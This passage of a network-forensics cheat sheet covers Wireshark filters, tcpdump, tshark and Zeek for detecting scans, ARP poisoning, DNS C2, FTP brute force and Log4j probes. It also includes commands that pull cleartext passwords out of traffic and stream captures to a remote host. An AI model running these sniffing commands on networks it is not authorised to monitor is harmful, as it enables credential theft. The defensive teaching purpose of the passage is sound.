 tcp.flags.syn==1 and tcp.flags.ack==0 and
 tcp.window_size <= 1024
TCP SYN scans usually have a window size less than or
equal to 1024 bytes, as the handshake is never completed
and the sender doesn't expect to receive data.
Detecting UDP scans / NMAP scans
 icmp.type==3 and icmp.code==3
UDP scans don't require a handshake; closed ports respond
with an ICMP error message (type 3, code 3, port
unreachable).
Detecting ARP Poisoning
A regular ARP broadcast request asks if any of the
available hosts use an IP address and there will be a reply
from the host that uses the particular IP address.
For ARP requests
 arp.opcode == 1
For ARP Responses
 arp.opcode == 2
Possible ARP poisoning detection
 arp.duplicate-address-detected or
 arp.duplicate-address-frame
Then you can extract the source mac address and use it in
the below query to identify the malicious ARP requests
sent by the attacker
 eth.src == attacker-mac && arp.opcode == 1
Possible ARP flooding detection
 ((arp) && (arp.opcode == 1)) &&
 (arp.src.hw_mac == target-mac-address)
A suspicious situation means having two different ARP
responses (a conflict) for a particular IP address.
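The duplicate-address logic can also be checked outside Wireshark. A minimal Python sketch, assuming the (IP, MAC) pairs have already been exported from the ARP replies (opcode 2) in the capture; the function name and sample values are hypothetical:

```python
from collections import defaultdict

def find_arp_conflicts(replies):
    """replies: iterable of (ip, mac) tuples taken from ARP responses.
    Returns {ip: set_of_macs} for every IP claimed by 2+ MACs."""
    seen = defaultdict(set)
    for ip, mac in replies:
        seen[ip].add(mac.lower())
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}

replies = [
    ("192.168.1.1", "aa:bb:cc:dd:ee:ff"),   # legitimate gateway reply
    ("192.168.1.1", "11:22:33:44:55:66"),   # second MAC claiming the same IP
    ("192.168.1.25", "de:ad:be:ef:00:01"),
]
print(find_arp_conflicts(replies))
```

Any IP returned here is a candidate ARP-poisoning victim; the extra MAC is the one to plug into the `eth.src` filter above.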
DHCP Investigation
Usually to list all DHCP packets we can conduct a global
search in Wireshark.
 dhcp
To find DHCP requests which help in identifying hostnames
of the sending hosts as well
 dhcp.option.dhcp == 3
To list the packets that contain the accepted DHCP
responses
 dhcp.option.dhcp == 5
To list packets that contain the denied DHCP requests
 dhcp.option.dhcp == 6
If we are looking to extract hostnames using DHCP
protocol, we can use the below filter to extract the
hostname from the DHCP requests.
 dhcp.option.hostname contains "keyword"
Similarly we can use the DHCP ACK responses to extract
hostnames and domain names
 dhcp.option.domain_name contains "keyword"
Another common option is   requested_ip_address      which
can help us search for which host requested a specific IP
address
 dhcp.option.requested_ip_address == ip
NETBIOS Investigation
NetBIOS or Network Basic Input/Output System is the
technology responsible for allowing applications on
different hosts to communicate with each other.
Global Wireshark search
 nbns
We can also extract hostnames using a NetBIOS query
 nbns.name contains "keyword"
You could use name, TTL or IP.
Opcodes can also be used to search for certain events
such as host name registration
 nbns.flags.opcode == 5
Kerberos Investigation
Kerberos is the default authentication service for
Microsoft Windows domains. It is responsible for
authenticating service requests between two or more
computers over the untrusted network. The ultimate aim
is to prove identity securely.
Global Wireshark search
 kerberos
We can search for user accounts using the below query
 kerberos.CNameString contains "keyword"
Some packets could provide hostname information in this
field. To avoid this confusion, filter on the   "$"
value: values that end with   "$"   are hostnames, and the ones
without it are user names.
 kerberos.CNameString and !
 (kerberos.CNameString contains "$" )
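The "$" convention is also handy when post-processing exported CNameString values. A hypothetical helper (not a Wireshark feature) that applies the same rule:

```python
def classify_cname(value: str) -> str:
    """Machine (host) accounts in Kerberos CNameString end with '$';
    plain values are user accounts."""
    return "hostname" if value.endswith("$") else "username"

for name in ["DESKTOP-01$", "bob.smith"]:
    print(name, "->", classify_cname(name))
```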
We can also filter for domain names
 kerberos.realm contains ".org"
Similarly, we can search for service and domain names for
generated tickets
 kerberos.SNameString == "krbtgt"
ICMP Analysis
A large volume of ICMP traffic or anomalous packet sizes
are indicators of ICMP tunnelling.
Global ICMP Wireshark search
 icmp
Searching for packet whose length is more than 64
 data.len > 64 and icmp
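The same length heuristic can be applied to exported ICMP data lengths. A minimal sketch, assuming the (packet number, data length) pairs were already pulled from the capture; 64 bytes is the same cutoff the filter uses:

```python
def icmp_tunnel_suspects(packets, max_data_len=64):
    """packets: iterable of (packet_no, data_len) for ICMP packets.
    Flags oversized payloads, a common sign of ICMP tunnelling."""
    return [no for no, length in packets if length > max_data_len]

packets = [(1, 48), (2, 48), (3, 1400), (4, 48)]
print(icmp_tunnel_suspects(packets))
```

Normal echo payloads are small and uniform, so a handful of outliers like packet 3 above is worth a closer look.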
DNS Analysis
Global DNS Wireshark search
 dns
Usually malicious DNS queries, that are sent to C2
servers, are longer than default DNS queries and crafted
for subdomain addresses. We can filter by query length
 dns.qry.name.len > 15 and !mdns
We can also search for C2 patterns such as dnscat
 dns contains "dnscat"
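Beyond a raw length filter, a quick pass over exported query names helps triage candidate C2 domains. A sketch under the assumption that the names were already extracted (e.g. with a tshark fields export); the 15-character threshold mirrors the filter above:

```python
def suspicious_queries(names, max_len=15):
    """Flag DNS query names whose leftmost label is unusually long,
    as crafted tunnelling/C2 subdomains often are."""
    flagged = []
    for name in names:
        label = name.split(".")[0]   # leftmost (most specific) label
        if len(label) > max_len:
            flagged.append(name)
    return flagged

queries = ["mail.example.com", "a9f3c1e8b2d47765feedc0de.badcdn.net"]
print(suspicious_queries(queries))
```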
FTP Analysis
File Transfer Protocol (FTP) is designed to transfer files
with ease, so it focuses on simplicity rather than
security.
As a result of this, using this protocol in unsecured
environments could create security issues like:
       MITM attacks
       Credential stealing and unauthorised access
       Phishing
       Malware planting
       Data exfiltration
Global FTP Wireshark search
 ftp
"FTP" search options:
       x1x series: Information request responses.
       x2x series: Connection messages.
       x3x series: Authentication messages.
"x1x" series options:
       211: System status.
       212: Directory status.
       213: File status.
 ftp.response.code == 211
"x2x" series options:
       220: Service ready.
       227: Entering passive mode.
       228: Long passive mode.
       229: Extended passive mode.
 ftp.response.code == 227
"x3x" series options:
       230: User login.
       231: User logout.
       331: Valid username.
     430: Invalid username or password
     530: No login, invalid password
 ftp.response.code == 230
"FTP" commands :
     USER: username.
     PASS: Password.
     CWD: Current work directory.
     LIST: List
 ftp.request.command == "USER"
 ftp.request.command == "PASS"
 ftp.request.arg == "password"
Listing failed login attempts
 ftp.response.code == 530
List the target username for brute force
 (ftp.response.code == 530) and
 (ftp.response.arg contains "username")
Detect password spray and list targets
 (ftp.request.command == "PASS" ) and
 (ftp.request.arg == "password")
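Counting 530 responses per client is the programmatic version of the brute-force filters above. A minimal sketch over (client IP, response code) pairs you would export from the capture; the names and the threshold of 5 are illustrative:

```python
from collections import Counter

def brute_force_suspects(events, threshold=5):
    """events: iterable of (client_ip, ftp_response_code).
    Returns IPs that triggered >= threshold failed logins (code 530)."""
    failures = Counter(ip for ip, code in events if code == 530)
    return [ip for ip, n in failures.items() if n >= threshold]

events = [("10.0.0.5", 530)] * 6 + [("10.0.0.9", 230)]
print(brute_force_suspects(events))
```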
HTTP Analysis
Global HTTP Wireshark search
 http
 http2
Searching by request method
 http.request.method == "GET"
 http.request.method == "POST"
 http.request
HTTP response codes
     200 OK: Request successful.
     301 Moved Permanently: Resource is moved to a new
     URL/path (permanently).
     302 Moved Temporarily: Resource is moved to a new
     URL/path (temporarily).
     400 Bad Request: Server didn't understand the
     request.
     401 Unauthorised: URL needs authorisation (login,
     etc.).
     403 Forbidden: No access to the requested URL.
     404 Not Found: Server can't find the requested URL.
     405 Method Not Allowed: Used method is not suitable
     or blocked.
      408 Request Timeout: Request took longer than the
      server wait time.
     500 Internal Server Error: Request not completed,
     unexpected error.
      503 Service Unavailable: Request not completed;
      server or service is down.
 http.response.code == 200
 http.response.code == 401
 http.response.code == 503
Searching by user agent
[1]
 http.user_agent contains "nmap"
[2]
 (http.user_agent      contains        "sqlmap") or
 (http.user_agent      contains        "Nmap") or
 (http.user_agent      contains        "Wfuzz") or
 (http.user_agent      contains        "Nikto")
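The same tool-signature matching can be done once user agents are exported from the capture. A hedged sketch: the signature list mirrors the filter above and is far from exhaustive, and lowercase matching keeps it case-insensitive:

```python
SCANNER_SIGNATURES = ("nmap", "sqlmap", "wfuzz", "nikto")

def is_scanner_ua(user_agent: str) -> bool:
    """Return True if a known scanner name appears in the user agent."""
    ua = user_agent.lower()
    return any(sig in ua for sig in SCANNER_SIGNATURES)

print(is_scanner_ua("Mozilla/5.0 (compatible; Nmap Scripting Engine)"))
print(is_scanner_ua("Mozilla/5.0 (Windows NT 10.0; Win64; x64)"))
```

Remember that user agents are attacker-controlled, so an empty result here never proves the traffic is clean.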
Searching in the URL
[1]
 http.request.uri contains "admin"
[2]
 http.request.full_uri contains "admin"
Searching for the web server software
 http.server contains "apache"
Searching for the hostname of the web server
 http.host contains "keyword"
Detecting Log4j Vulnerability
The attack starts with a "POST" request
 http.request.method == "POST"
There are known cleartext patterns: "jndi:ldap" and
"Exploit.class".
[1]
 (ip contains "jndi") or ( ip contains
 "Exploit")
[2]
 (frame contains "jndi") or ( frame contains
 "Exploit")
[3]
 (http.user_agent contains "$") or
 (http.user_agent contains "==")
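Those indicator patterns can be checked programmatically over exported payload strings. An illustrative sketch (function name and indicator list are assumptions, not a standard detection): it looks for the cleartext patterns and also tries a base64 decode, since obfuscated payloads (the "$" / "==" user agents above) often hide the JNDI string there:

```python
import base64

INDICATORS = ("jndi:ldap", "jndi:rmi", "jndi:dns", "Exploit.class")

def log4shell_indicators(payload: str):
    """Return the Log4Shell indicators present in a payload string,
    checking both the raw text and a base64-decoded copy of it."""
    hits = [i for i in INDICATORS if i in payload]
    try:
        decoded = base64.b64decode(payload, validate=True).decode("utf-8", "ignore")
        hits += [i for i in INDICATORS if i in decoded]
    except Exception:
        pass  # payload was not valid base64; nothing more to check
    return hits

print(log4shell_indicators("${jndi:ldap://evil/a}"))
```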
HTTPS Analysis
In Wireshark, HTTPS packets will appear in different
colours as the HTTP traffic is encrypted. Also, protocol
and info details (actual URL address and data returned
from the server) will not be fully visible.
HTTPS search parameters:
      http.request : Listing all requests
      tls : Global TLS search
      tls.handshake.type == 1 : TLS Client Hello
      tls.handshake.type == 2 : TLS Server Hello
      ssdp : Local Simple Service Discovery Protocol
      (SSDP). SSDP is a network protocol that provides
      advertisement and discovery of network services.
An example is below
 tls.handshake.type == 1
Similar to the TCP three-way handshake process, the TLS
protocol has its handshake process. The first two steps
contain "Client Hello" and "Server Hello" messages. The
given filters show the initial hello packets in a capture
file. These filters are helpful to spot which IP addresses
are involved in the TLS handshake.
Client Hello
 (http.request or tls.handshake.type == 1) and
 !(ssdp)
Server Hello
 (http.request or tls.handshake.type == 2) and
 !(ssdp)
Extracting Clear-Text Credentials
Some Wireshark dissectors (FTP, HTTP, IMAP, POP and
SMTP) are programmed to extract cleartext passwords
from the capture file. You can view detected credentials
using the "Tools --> Credentials" menu. This feature
works only in Wireshark v3.1 and later. Since the
feature works only with particular
protocols, it is suggested to have manual checks and not
entirely rely on this feature to decide if there is a
cleartext credential in the traffic.
Once you use the feature, it will open a new window and
provide detected credentials. It will show the packet
number, protocol, username and additional information.
This window is clickable; clicking on the packet number
will select the packet containing the password, and
clicking on the username will select the packet containing
the username info. The additional info column shows the
packet number that contains the username.
Creating Firewall Rules From Wireshark
You can create firewall rules by using the "Tools --
> Firewall ACL Rules" menu. Once you use this feature, it
will open a new window and provide a combination of rules
(IP, port and MAC address-based) for different purposes.
Note that these rules are generated for implementation on
an outside firewall interface.
Currently, Wireshark can create rules for:
     Netfilter (iptables)
     Cisco IOS (standard/extended)
     IP Filter (ipfilter)
     IPFirewall (ipfw)
     Packet filter (pf)
     Windows Firewall (netsh new/old format)
TCPDUMP
Capturing traffic on any interface from a target   ip   and
sending the output to a    file
 # tcpdump -w file.pcap -i any dst ip
Same as above but only captures traffic on port 80
 # tcpdump -w file.pcap -i any dst ip and port
 80
View traffic in hex or ascii
 tcpdump -A
 tcpdump -X
Enable verbosity, disable name resolution and view traffic
with timestamp
 # tcpdump -tttt -n -vv
Displaying top 1000 packets
 # tcpdump -nn -c 1000 | awk '{print $3}' | cut
 -d. -f1-4 | sort -n | uniq -c | sort -nr
Viewing traffic between two IPs
 # tcpdump host ip1 && host ip2
Exclude traffic from a specific host ip
 # tcpdump not host ip
Exclude traffic from a specific subnet
 # tcpdump not net ip/cidr
Save the output to a remote SSH server
 # tcpdump -w - | ssh ip -p port
 "cat -> /tmp/remotecapture.pcap"
Display the traffic with a specific word
 # tcpdump -n -A -s0 | grep pass
Searching for passwords in clear-text non-encrypted
protocols
 # tcpdump -n -A -s0 port http or port ftp or
 port smtp or port imap or port pop3 | egrep -i
 'pass=|pwd=|log=|login=|user=|username=|pw=|pa
 ssw=|Passwd=|password=|pass: |user: |username:
 |password: |login: |pass |user ' --color=auto
 --line-buffered -B20
Filtering ipv6 or ipv4 traffic
 # tcpdump ip6
 # tcpdump ip
Tshark
Definition
TShark is an open-source command-line network traffic
analyser. It is created by the Wireshark developers and
has most of the features of Wireshark. It is commonly
used as a command-line version of Wireshark. However, it
can also be used like tcpdump. Therefore it is preferred
for comprehensive packet assessments.
Sniffing Traffic / Live Capture
Sniffing can be done with and without selecting a specific
interface. When a particular interface is selected, TShark
uses that interface to sniff the traffic. TShark will use
the first available interface when no interface is selected,
usually listed as 1 in the terminal. Having no interface
argument is an alias for   -i 1 .        You can also set different
sniffing interfaces by using the parameter         -i .   TShark
always echoes the used interface name at the beginning of
the sniffing.
 tshark
List available sniffing interfaces
 tshark -D
Listen for traffic on a single or multiple interfaces
 tshark -i eth1 -i eth2 -i eth3
 tshark -i eth0
Save captured traffic to a pcap file without name
resolution
 tshark -nn -w output.pcap
Stop after capturing a specified number of packets.
 tshark -c 10
Using silent mode to suppress the packet outputs on the
terminal
 tshark -q
TShark can show packet details in hex and ASCII format.
You can view the dump of the packets by using the       -
x   parameter. Once you use this parameter, all packets
will be shown in hex and ASCII format. Therefore, it might
be hard to spot anomalies at a glance, so using this
option after reducing the number of packets will be much
more efficient.
 tshark -r file.pcap -x
Default TShark packet processing and sniffing operations
provide a single line of information and exclude verbosity.
The default approach makes it easy to follow the number
of processed/sniffed packets; however, TShark can also
provide verbosity for each packet when instructed.
Verbosity is provided similarly to Wireshark's "Packet
Details Pane". As verbosity offers a long list of packet
details, it is suggested to use that option for specific
packets instead of a series of packets
 tshark -r demo.pcapng -c 1 -V
Capture Filters
The purpose of capture filters is to save only a specific
part of the traffic. It is set before capturing traffic and is
not changeable during live capture. Usually to use capture
filters, we specify the options         -f   in the command line
followed by the type of operator (ip,net,host,etc).
Filter a specific host
 tshark -f "host 10.10.10.10"
Filtering a network range
 tshark -f "net 10.10.10.0/24"
Filtering a Port
 tshark -f "port 80"
Filtering a port range
 tshark -f "portrange 80-100"
Filtering source address
 tshark -f "src host 10.10.10.10"
Filtering destination address
 tshark -f "dst host 10.10.10.10"
Filtering TCP
 tshark -f "tcp"
Filtering MAC address
 tshark -f "ether host F8:DB:C5:A2:5D:81"
Listen for traffic on a specific protocol
 tshark protocol
Display traffic on either ARP or ICMP protocols
 tshark arp or icmp
Capture traffic between two hosts
 tshark "host <HOST l> && host <HOST 2>"
Capture traffic between two subnets
 tshark -n "net subnet1 && net subnet2"
Filter out an IP from the displayed traffic
 tshark not host ip
Specifying a port
 tshark -Y 'udp.port == 53'
Display only source and destination IPs separated by a
comma
 tshark -n -e ip.src -e ip.dst -T fields -E
 separator=, -R ip
Grab DNS queries from a source IP. Useful for hunting for
malicious traffic to C2
 tshark -n -e ip.src -e dns.qry.name -E
 separator=';' -T fields port 53
Grab HTTP requested URLs and hosts
 tshark -R http.request -T fields -E
 separator=';' -e http.host -e http.request.uri
Grab requested URLs that contain       .exe
 tshark -n -e http.request.uri -R http.request
 -T fields | grep exe
Top 100 Destination IPs
 tshark -n -c 100 | awk '{print $4}' | sort -n
 |
 uniq -c | sort -nr
Top Stats based on protocol
 tshark -q -z io,phs -r file.pcap
Top 1000 http requests
 tshark -n -c 1000 -e http.host -R http.request
 -T fields port 80 | sort | uniq -c | sort -r
Grab server names for SSL certificates in a given pcap file
 # tshark -nr file.pcap -Y
 "ssl.handshake.ciphersuites" -Vx | grep
 "ServerName:" | sort | uniq -c | sort -r
Run Tshark for 10 seconds and stop
 tshark -w test.pcap -a duration:10
Run Tshark and stop when the output file reaches 500 KB
 tshark -w test.pcap -a filesize:500
Run Tshark until the output file size reaches 500 KB and
then create a new output file and continue capturing.
 tshark -w test.pcap -b filesize:500
Run Tshark for 10 seconds then create a new output file
and continue capturing.
 tshark -w test.pcap -b duration:10
PCAP Analysis
Read a capture file
 tshark -r demo.pcapng
Display traffic from a specific IP
 tshark -r file.pcap -q -z ipv4
Top http stats
 tshark -r file.pcap -R http.request -T
 fields -e http.host -e http.request.uri | sed
 -e 's/?.*$//' | sed -e
 's#^\(.*\)\t\(.*\)$#http://\1\2#' | sort |
 uniq -c | sort -rn | head
Replay a pcap file and display hosts
 tshark -r file.pcap -q -z hosts
Display Filters
The purpose of display filters is to investigate packets
after finishing live traffic. We usually do it with the
options   -Y   followed by the operator. Below are some
examples;
Filtering an IP without specifying a direction
 tshark -Y 'ip.addr == 10.10.10.10'
Filtering a network range
 tshark -Y 'ip.addr == 10.10.10.0/24'
Filtering a source IP
 tshark -Y 'ip.src == 10.10.10.10'
Filtering a destination IP
 tshark -Y 'ip.dst == 10.10.10.10'
Filtering TCP port
 tshark -Y 'tcp.port == 80'
Filtering source TCP port
 tshark -Y 'tcp.srcport == 80'
Filtering HTTP packets
 tshark -Y 'http'
Filtering HTTP packets with response code "200"
 tshark -Y "http.response.code == 200"
Filtering DNS packets
 tshark -Y 'dns'
Filtering all DNS packets with record    A
 tshark -Y 'dns.qry.type == 1'
You can use the   nl   command to get a numbered list of
your output. Therefore you can easily calculate the "total
number of filtered packets" without being confused with
assigned packet numbers. The usage of the   nl
command is shown below.
 tshark -r file.pcapng -Y 'http' | nl
Analytics
Protocol hierarchy & Stats
Protocol hierarchy helps analysts to see the protocols
used, frame numbers, and size of packets in a tree view
based on packet numbers. As it provides a summary of
the capture, it can help analysts decide the focus point
for an event of interest. Use the       -z io,phs -
q   parameters to view the protocol hierarchy
 tshark -r pcap.pcapng -z io,phs -q
After viewing the entire packet tree, you can focus on a
specific protocol as shown below. Add the       udp    keyword
to the filter to focus on the UDP protocol.
 tshark -r pcap.pcapng -z io,phs,udp -q
Packet Length
The packet lengths tree view helps analysts to overview
the general distribution of packets by size in a tree view.
It allows analysts to detect anomalously big and small
packets at a glance! Use the       -z plen,tree -
q   parameters to view the packet lengths tree.
 tshark -r demo.pcapng -z plen,tree -q
Endpoints
The endpoint statistics view helps analysts to overview
the unique endpoints. It also shows the number of packets
associated with each endpoint. Similar to Wireshark,
TShark supports multiple source filtering options for
endpoint identification. Use the        -z endpoints,ip -
q   parameters to view IP endpoints.
 tshark -r pcap.pcapng -z endpoints,ip -q
Conversations
The conversations view helps analysts to overview the
traffic flow between two particular connection points.
Similar to endpoint filtering, conversations can be viewed
in multiple formats. This filter uses the same parameters
as the "Endpoints" option. Use the         -z conv,ip -
q   parameters to view IP conversations.
 tshark -r demo.pcapng -z conv,ip -q
IPv4 and IPv6
This option provides statistics on IPv4 and IPv6 packets,
as shown below. Having the protocol statistics helps
analysts to overview packet distribution according to the
protocol type. You can filter the available protocol types
and view the details using the          -z ptype,tree -
q     parameters.
 tshark -r demo.pcapng -z ptype,tree -q
Having the summary of the hosts in a single view is useful
as well. Especially when you are working with large
captures, viewing all hosts with a single command can
help you to detect an anomalous host at a glance. You can
filter all IP addresses using the parameters given below.
 #ipv4
 tshark -r demo.pcapng -z ip_hosts,tree -q
 #ipv6
 tshark -r demo.pcapng -z ipv6_hosts,tree -q
We can also narrow down the focus based on the direction
flow be it source or destination IPs
 #ipv4
 tshark -r demo.pcapng -z ip_srcdst,tree -q
 #ipv6
 tshark -r demo.pcapng -z ipv6_srcdst,tree -q
DNS
Stats on DNS Packets
 tshark -r demo.pcapng -z dns,tree -q
HTTP
Stats on HTTP Packets
 tshark -r demo.pcapng -z http,tree -q
You can filter the packets and view the details using the
parameters given below.
     Packet and status counter for HTTP:       -z
      http,tree -q
     Packet and status counter for HTTP2:          -z
      http2,tree -q
     Load distribution:-z http_srv,tree -q
     Requests: -z http_req,tree -q
     Requests and responses: -z http_seq,tree -q
Following Streams
Similar to Wireshark, you can filter the packets and follow
the streams by using the parameters given below. Note
that streams start from "0".
     TCP Streams: -z follow,tcp,ascii,0 -q
     UDP Streams: -z follow,udp,ascii,0 -q
     HTTP Streams: -z follow,http,ascii,0 -q
Following the second tcp stream:
 tshark -r demo.pcapng -z follow,tcp,ascii,1 -q
Exporting Objects
This option helps analysts to extract files from
DICOM, HTTP, IMF, SMB and TFTP using the option         --
export-objects     followed by the protocol.
The below command extracts   http   objects and saves them
to the   objects   directory
 tshark -r pcap.pcapng --export-objects
 http,/home/kali/Desktop/objects -q
Extracting Clear Text Credentials
This option helps analysts to detect and collect cleartext
credentials from FTP, HTTP, IMAP, POP and SMTP. Use               -z
credentials
 tshark -r pcap.pcap -z credentials -q
Fields Extraction
This option helps analysts to extract specific parts of data
from the packets. In this way, analysts have the
opportunity to collect and correlate various fields from the
packets.
You can use the option    -T fields    followed by    -e
<field-name>    to extract data from a specific field, and
add    -E header=y    to print the field names as a
header row.
Below command extracts source and destination IPs from
the first five packets.
 tshark -r data.pcapng -T fields -e ip.src -e
 ip.dst -E header=y -c 5
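Output from a fields export is easy to post-process. A hypothetical parser for the two-column output above (the separator is assumed to be a tab, tshark's default for field output; the sample lines are invented):

```python
def parse_field_lines(lines, sep="\t"):
    """Turn 'src<TAB>dst' lines from a tshark fields export into tuples,
    skipping an optional header row produced by -E header=y."""
    rows = []
    for i, line in enumerate(lines):
        parts = line.rstrip("\n").split(sep)
        if i == 0 and parts[0] == "ip.src":  # header row from -E header=y
            continue
        rows.append(tuple(parts))
    return rows

sample = ["ip.src\tip.dst", "10.0.0.1\t8.8.8.8", "10.0.0.2\t1.1.1.1"]
print(parse_field_lines(sample))
```

From here the tuples can be fed straight into counters or conflict checks like the ones earlier in these notes.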
Conditional Data Extraction
Using Contains
We can use this operator with the option     -Y      that's
used for display filters. The example below searches all HTTP
packets where the server field contains      Apache
 tshark -r file.pcapng -Y 'http.server contains
 "Apache"'
Using Matches
Similar to   contains ,   we can use this operator, but it
accepts regular expressions rather than a fixed keyword.
Below we extract packets where the field
http.request.method       matches either   GET   or    POST
 tshark -r file.pcapng -Y 'http.request.method
 matches "(GET|POST)"'
Zeek
Definition
Zeek is a passive, open-source network traffic analyser.
Many operators use Zeek as a network security monitor
(NSM) to support suspicious or malicious activity
investigations. Zeek also supports a wide range of traffic
analysis tasks beyond the security domain, including
performance measurement and troubleshooting.
Zeek Architecture
Zeek has two primary layers; "Event Engine" and "Policy
Script Interpreter". The Event Engine layer is where the
packets are processed; it is called the event core and is
responsible for describing the event without focusing on
event details. It is where the packets are divided into
parts such as source and destination addresses, protocol
identification, session analysis and file extraction. The
Policy Script Interpreter layer is where the semantic
analysis is conducted. It is responsible for describing the
event correlations by using Zeek scripts.
Zeek Frameworks
Zeek has several frameworks to provide extended
functionality in the scripting layer. These frameworks
enhance Zeek's flexibility and compatibility with other
network components.
Running Zeek as a service
Run Zeek as a service to be able to perform live network
packet capture or to listen to the live network traffic.
To run Zeek as a service we will need to start the
"ZeekControl" module which requires superuser
permissions to use. You can elevate the session privileges
and switch to the superuser account to examine the
generated log files with the following command:    sudo su
 root@ubuntu$ zeekctl
Primary management of the Zeek service is done with
three commands; "status", "start", and "stop".
      zeekctl status
      zeekctl start
      zeekctl stop
Running Zeek as a Packet Investigator
Once you process a pcap file, Zeek automatically creates
log files according to the traffic.
In pcap processing mode, logs are saved in the working
directory. You can view the generated logs using the     ls
-l   command.
 zeek -C -r sample.pcap
-r : Reading option, read/process       a pcap file.
-C : Ignoring checksum errors.
-v : Version information.
zeekctl :ZeekControl module.
Logging
Zeek provides 50+ log files under seven different
categories, which are helpful in various areas such as
traffic monitoring, intrusion detection, threat hunting and
web analytics.
Once you process a pcap with Zeek, it will create the logs
in the working directory. If you run the Zeek as a
service, your logs will be located in the default log
path. The default log path is:     /opt/zeek/logs/
Correlation between different log files generated by Zeek
is done through a unique value called "UID". The "UID"
represents the unique identifier assigned to each session.
Investigating the generated logs will require command-line
tools (cat, cut, grep, sort, and uniq) and additional tools
(zeek-cut).
In addition to Linux command-line tools, one auxiliary
program called   zeek-cut    reduces the effort of
extracting specific columns from log files. Each log file
provides "field names" in the beginning. This information
will help you while using   zeek-cut .   Make sure that you
use the "fields" and not the "types".
Example of using zeek-cut to process a log file is shown
below:
 cat conn.log | zeek-cut uid proto id.orig_h
 id.orig_p id.resp_h id.resp_p
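When zeek-cut is not available, the same column extraction can be approximated in Python by reading the "#fields" header of a Zeek TSV log. A sketch under that assumption (Zeek's default field separator is a tab; the sample log lines are invented):

```python
def cut_zeek_log(lines, wanted):
    """Extract named columns from Zeek TSV log lines, using the
    '#fields' header to locate them (similar to zeek-cut)."""
    fields, out = [], []
    for line in lines:
        if line.startswith("#fields"):
            fields = line.strip().split("\t")[1:]   # field names follow the tag
        elif line.startswith("#") or not fields:
            continue                                # other headers / no schema yet
        else:
            row = dict(zip(fields, line.strip().split("\t")))
            out.append([row.get(f, "-") for f in wanted])
    return out

log = [
    "#fields\tts\tuid\tid.orig_h\tid.resp_h",
    "#types\ttime\tstring\taddr\taddr",
    "1616780400.1\tCabc123\t10.0.0.5\t93.184.216.34",
]
print(cut_zeek_log(log, ["uid", "id.orig_h"]))
```

As the notes say, always key on the "fields" names, not the "types" line.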
The tables below describe the log types in a nutshell
[1]
[2]
      Overall Info :      The aim is to review the overall
      connections, shared files, loaded scripts and
      indicators at once. This is the first step of the
      investigation.
      Protocol Based :       Once you review the overall
      traffic and find suspicious indicators or want to
      conduct a more in-depth investigation, you focus on
      a specific protocol.
      Detection :      Use the prebuilt or custom scripts and
      signature outcomes to support your findings by
      having additional indicators or linked actions.
      Observation :      The summary of the hosts,
      services, software, and unexpected activity
      statistics will help you discover possible missing
      points and conclude the investigation.
Zeek Signatures
Zeek supports signatures to have rules and event
correlations to find noteworthy activities on the network.
Zeek signatures use low-level pattern matching and cover
conditions similar to Snort rules. Unlike Snort rules, Zeek
rules are not the primary event detection point. Zeek has
a scripting language and can chain multiple events to find
an event of interest.
Zeek signatures are composed of three logical paths:
      Signature id : Unique signature name.
      Conditions : Header: Filtering the packet    headers
     for specific source and destination addresses,
     protocol and port numbers. Content: Filtering the
     packet payload for specific value/pattern.
      Action :   Default action: Create the
     "signatures.log" file in case of a signature match.
     Additional action: Trigger a Zeek script.
The below table provides the most common conditions and
filters for the Zeek signatures.
Below command shows how to use a signature file while
analyzing a PCAP
 zeek -C -r sample.pcap -s sample.sig
Example Signature | Cleartext Submission of Password
The rule will match when a "password" phrase is detected
in the packet payload. Once the match occurs, Zeek will
generate an alert and create additional log files
(signatures.log and notice.log).
 signature http-password {
     ip-proto == tcp
     dst-port == 80
     payload /.*password.*/
     event "Cleartext Password Found!"
 }

 #   signature: Signature name.
 #   ip-proto: Filtering TCP connections.
 #   dst-port: Filtering destination port 80.
 #   payload: Filtering the "password" phrase.
 #   event: Signature match message.
Example Signature| FTP Brute-force
This time, we will use the FTP content filter to investigate
command-line inputs of the FTP traffic. The aim is to
detect FTP "admin" login attempts. This basic signature
will help us identify the admin login attempts and have an
idea of possible admin account abuse or compromise
events.
 signature ftp-admin
 {
 ip-proto == tcp
 ftp /.*USER.*admin.*/
 event "FTP Admin Login Attempt!"
 }
Or you can tweak the signature to create logs for each
event containing "FTP 530 response", which allows us to
track the login failure events regardless of username.
This rule should show us two types of alerts and help us
to correlate the events by having "FTP Username Input"
and "FTP Brute-force Attempt" event messages.
 signature ftp-username
 {
 ip-proto == tcp
 ftp /.*USER.*/
 event "FTP Username Input Found!"
 }
 signature ftp-brute
 {
 ip-proto == tcp
 payload /.*530.*Login incorrect.*/
 event "FTP Brute-force Attempt!"
 }
Zeek Scripts
Zeek has its own event-driven scripting language, which
is as powerful as high-level languages and allows us to
investigate and correlate the detected events.
     Zeek scripts use the ".zeek" extension.
     Do not modify anything under the
     "/opt/zeek/share/zeek/base" directory. User-
     generated and modified scripts should be in the
     "/opt/zeek/share/zeek/site" directory.
     You can call scripts in live monitoring mode by
     loading them with the  @load /script/path  or
      @load script-name  directive in the
      local.zeek  file.
     Zeek is event-oriented, not packet-oriented! We
     need to use/write scripts to handle the event of
     interest.
     Example Script | DHCP Hosts Extraction
     Here, the first, second and fourth lines are
     predefined syntax of the scripting language. The
     only part we created is the third line, which
     tells Zeek to extract DHCP hostnames.
 event dhcp_message (c: connection, is_orig:
 bool, msg: DHCP::Msg, options: DHCP::Options)
 {
 print options$host_name;
 }
Then the script can be invoked from the command line
 zeek -C -r smallFlows.pcap dhcp-hostname.zeek
Note that Zeek scripting is a programming language itself,
and we are not covering the fundamentals of Zeek
scripting. You can learn and practice the Zeek scripting
language by using Zeek's official training platform for
free.
You can also load all local scripts identified in your
"local.zeek" file. Note that base scripts cover multiple
framework functionalities. You can load all base scripts
simply by running the  local  command.
 zeek -C -r ftp.pcap local
Loaded scripts generate log files such as
loaded_scripts.log, capture_loss.log, notice.log,
stats.log, etc. However, Zeek doesn't create log files
for scripts that have no hits or results.
Zeek has an FTP brute-force detection that can be invoked
from the command line by specifying its path.
 zeek -C -r ftp.pcap
 /opt/zeek/share/zeek/policy/protocols/ftp/detect-bruteforcing.zeek
Signatures with Scripts
We can use scripts collaboratively with other scripts and
signatures to get one step closer to event
correlation. Zeek scripts can refer to signatures and
other Zeek scripts as well. This flexibility provides a
massive advantage in event correlation.
The below basic script quickly checks if there is a
signature hit and provides terminal output to notify us. We
are using the "signature_match" event to accomplish this.
You can read more about events in the Zeek documentation.
Note that we are looking only for "ftp-admin" signature hits.
 event signature_match (state: signature_state,
 msg: string, data: string)
